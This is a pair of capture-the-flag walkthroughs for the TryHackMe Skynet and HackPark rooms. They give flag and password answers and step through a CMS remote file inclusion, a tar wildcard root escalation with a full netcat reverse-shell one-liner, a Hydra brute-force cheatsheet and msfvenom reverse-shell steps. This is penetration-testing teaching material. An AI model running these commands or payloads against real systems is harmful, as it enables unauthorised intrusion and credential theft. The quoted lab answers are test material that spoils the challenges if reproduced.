thm-terminator-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called terminator at

[Task 1] Deploy and compromise the vulnerable machine!20/09/2019

Hasta la vista, baby.

Are you able to compromise this Terminator themed machine?

You can follow our official walkthrough for this challenge on our blog.

#1	What is Miles password for his emails?

cyborg007haloterminator

#2	What is the hidden directory?

#3	What is the vulnerability called when you can include a remote file for malicious purposes?

remote file inclusion

#4	What is the user flag?

#5	What is the root flag?

3f0372db24753accc7179a282cd6a949

Skynet Writeup

Follow along with this writeup, and deploy your own instance of Skynet! https://tryhackme.com/room/skynetSummary:

Scan ports using nmap
Use GoBuster to enumerate directories
Experiment with SMBMap to find Samba shares
Using enumerated credentials to read emails
Exploit CMS RFI vulnerability
Exploit tar wildcards for privilege escalation

Lets first begin by enumerating the machine as much as possible, by using nmap.

We can see that that there is a web server running, upon visiting we can see the following:

“Skynet” is a artificial neural network-based conscious group mind and artificial general intelligence system

Lets use GoBuster to locate any directories!

gobuster -u http://<ip> -w <wordlist_location> -t 40

Sometimes, we’re confident that there is something to be found and we waste too much time on it. Often, there are rabbit holes that can trip you up. Make sure to take breaks if you get stuck and try different approaches.

Going back to the drawing board, we saw that pop3 and imap ports were open, I wonder what else could be potentially found? Remember what I said above!

SMBMap allows users to enumerate samba share drives across an entire domain. This program is available on all Kali Linux machines. If you don’t have the time or resources to set your own Kali Linux machine up, you can deploy your own and control it within your browser. Check it out.

The scan reveals a share called “anonymous” that has read access. Lets connect to the share and investigate.

Log1.txt contains possible passwords and there is a smb share called milesdyson. We have some potential credentials here… But SSH is disabled! What else can we do?

An earlier GoBuster scan revealed SquirrelMail!

Gasp! Reading his emails reveals a Samba password reset!

Lets log into Miles’ share and see what interesting things we can find! You should find a file that gives you information about a new CMS.

Visiting the CMS reveals Miles Dysons Personal Page

If you use GoBuster on the /45kra24zxs28v3yd/ directory, you will reveal an /administrator page. This reveals a Cuppa CMS!

Looking at the source code will give you an indication of the CMS’ version. After some online research, there is a public exploit for it! https://www.exploit-db.com/exploits/25971

Get a shell script and change the IP to be your tun0 IP (ifconfig), host it locally using Python, use netcat to listen for a session and then remotely include this shell on the webserver.

The screenshot below explains the correct steps in obtaining a low privilege shell by exploiting the RFI vulnerability! You can download a PHP reverse shell from PentestMonkey.

So whats actually going on here? In the CMS code, there is a bit of PHP code that includes files:

<?php include($_REQUEST["urlConfig"]); ?>

However, this allows us to include our own shells (or even include a file on the system such as /etc/passwd). For a more detailed explanation, please read the exploit-db description.

Now that we have a shell, we can get the user flag. Next step is to escalate our privileges to root!

Upon enumerating the Linux machine, we can see there are several regular cronjobs running.

So the file /home/milesdyson/backups/backup.sh is being called every minute. Inspecting this file:

This gets a shell, navigates to the /var/www/html directory and create a backup of everything in the directory.

Well, believe it or not, this creates a vulnerability as we can use it to execute code. HelpNetSecurity best explains how this vulnerability works, but in essence, tar has wildcards and we can use checkpoint actions to execute commands.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip>
1234 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

Then open up a netcat session and you will receive a shell as root!

Author : Jacco Straathof

thm-hackpark-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called hackpark at

[Task 1] Deploy the vulnerable Windows machine06/08/2019

Connect to our network and deploy this machine. Please be patient as this machine can take up to 5 minutes to boot! You can test if you are connected to our network, by going to our access page. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

This room will cover brute-forcing an accounts credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.

#1	Deploy the machine and access its web server.

#2	Whats the name of the clown displayed on the homepage?

[Task 2] Using Hydra to brute-force a login

Hydra is a parallelized, fast and flexible login cracker. If you don’t have Hydra installed or need a Linux machine to use it, you can deploy a powerful Kali Linux machine and control it in your browser!

Brute-forcing can be trying every combination of a password. Dictionary-attack’s are also a type of brute-forcing, where we iterating through a wordlist to obtain the password.

We need to find a login page to attack and identify what type of request the form is making to the webserver. Typically, web servers make two types of requests, a GET request which is used to request data from a webserver and a POST request which is used to send data to a server.

You can check what request a form is making by right clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found here).

What request type is the Windows website login form using?

Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.

Run the following command but fill in the blanks:

hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form

Guess a username, choose a password wordlist and gain credentials to a user account!

Hydra really does have lots of functionality, and there are many “modules” available (an example of a module would be the http-post-form that we used above).

However, this tool is not only good for brute-forcing HTTP forms, but other protocols such as FTP, SSH, SMTP, SMB and more.

Below is a mini cheatsheet:

Command	Description
hydra -P <wordlist> -v <ip> <protocol>	Brute force against a protocol of your choice
hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>	You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)
hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>	Attack a Windows Remote Desktop with a password list.
hydra -l <username> -P .<password list> $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’	Craft a more specific request for Hydra to brute force.

[Task 3] Compromise the machine

In this task, you will identify and execute a public exploit (from exploit-db.com) to get initial access on this Windows machine!

Exploit-Database is a CVE (common vulnerability and exposures) archive of public exploits and corresponding vulnerable software, developed for the use of penetration testers and vulnerability researches. It is owned by Offensive Security (who are responsible for OSCP and Kali)

#1	Now you have logged into the website, are you able to identify the version of the BlogEngine?

#2	Use the exploit database archive to find an exploit to gain a reverse shell on this system. What is the CVE?

#3	Using the public exploit, gain initial access to the server. Who is the webserver running as?

[Task 4] Windows Privilege Escalation

In this task we will learn about the basics of Windows Privilege Escalation.

First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.

Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.

If you don’t know how to do this, I suggest completing up to task 3 in our Metasploit room first!

Tip: You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually!

#2	You can run metasploit commands such as sysinfo to get detailed information about the Windows system. Then feed this information into the windows-exploit-suggester script and quickly identify any obvious vulnerabilities. What is the OS version of this windows machine?

#3	Further enumerate the machine. What is the name of the abnormal service running?

#4	What is the name of the binary you’re supposed to exploit?

#5	Using this abnormal service, escalate your privileges! What is the user flag (on Jeffs Desktop)?

#6	What is the root flag?

[Task 5] Privilege Escalation Without Metasploit

…..

In this task we will escalate our privileges without the use of meterpreter/metasploit!

Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell.

Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.

#1	Now we can generate a more stable shell using msfvenom, instead of using a meterpreter, This time let’s set our payload to windows/shell_reverse_tcp

#2	After generating our payload we need to pull this onto the box using powershell. Tip: It’s common to find C:\Windows\Temp is world writable!

Now you know how to pull files from your machine to the victims machine, we can pull winPEAS.bat to the system using the same method! (You can find winPEAS here)

WinPeas is a great tool which will enumerate the system and attempt to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!

Tip: You can execute these files by using .\filename.exe

Using winPeas, what was the Original Install time of the server ? (This is date and time) ,Found from cmd-shell with : systeminfo

Writeup :

Try it for yourself here.

Deployment and reverse image search

After the machine deployed I opened the website and got prompted by this friendly clown:

I guess most of you recognized him right off the bat as Pennywise from the Movie IT. I didn’t, so I used reverse image search to find who he is. Google didn’t provide any good output, but TinEye did.

Login brute force with Hydra

The website has a login section. TryHackMe prompts us to guess a user name, so we’ll use good old “admin”. Here’s the Hydra command to brute-force the web form:

Don’t panic, it’s not really complicated

Most of the command consists of the string after “http-post-form”. This string has three parts divided by colons — “path to the login form page : request body : error message indicating failure”

To get this information open the networks tab in the developer tools, send one login request with random credentials and inspected it by clicking “Edit and Resend”.

The request body can be found in the “Request Body” section at the bottom. Before pasting it in the terminal we need to find where the credentials are used, so hydra would know to insert it’s guessing there.

Now I can replace the “asdf” I entered with ^USER^ and ^PASS^ for Hydra

One last piece of information Hydra needs is a message indicating failure, so it could tell when the guessed password is correct. At login failure, the site prompts us with “Login failed”. That’s exactly the string We need.

After running Hydra and obtaining the password We can log into BlogEngine as admin 🔥

Compromise the machine

The first thing to be done is to check the version of BlogEngine. It can be found in the “About” tab. A quick google search of this version revealed this exploit in exploit-db.

Example search for an exploit with the “searchsploit” command on Kali Linux. We’ll use the fourth result.

Inside the exploit, a comment specified exactly what we needed to do to get this running. Firstly change the address and port of the attacker to yours.